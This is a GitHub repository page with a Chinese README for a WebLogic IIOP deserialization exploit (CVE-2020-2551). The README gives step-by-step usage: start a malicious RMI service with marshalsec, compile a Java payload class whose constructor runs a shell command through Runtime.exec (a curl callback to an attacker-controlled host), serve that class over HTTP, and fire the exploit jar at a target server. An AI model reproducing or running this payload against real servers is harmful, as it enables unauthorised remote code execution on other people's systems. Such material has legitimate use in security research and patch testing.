Skip to content
Weblogic IIOP CVE-2020-2551
Java Makefile
Branch: master
Clone or download

Latest commit

Y4er Merge pull request #4 from gelim/master
Sync command run with README
Latest commit 21b7a56 Mar 5, 2020

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
src Sync command run with README Mar 4, 2020
.gitignore push Feb 28, 2020
Makefile Add build.xml + Makefile for make+ant building Mar 4, 2020
README.md push Feb 28, 2020
build.xml Add build.xml + Makefile for make+ant building Mar 4, 2020
weblogic_CVE_2020_2551.iml push Feb 28, 2020

README.md

CVE-2020-2551

Weblogic IIOP 反序列化

测试环境

Weblogic10.3.6+jdk1.6

打包好的jar包 提取码:a6ob

漏洞利用

下载jar包,然后使用marshalsec起一个恶意的RMI服务,本地编译一个exp.java

package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译 然后本地起一个web服务器

python -m http.server --bind 0.0.0.0 80

命令行运行jar包

java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

实际效果如图 image

参考

https://y4er.com/post/weblogic-cve-2020-2551/

You can’t perform that action at this time.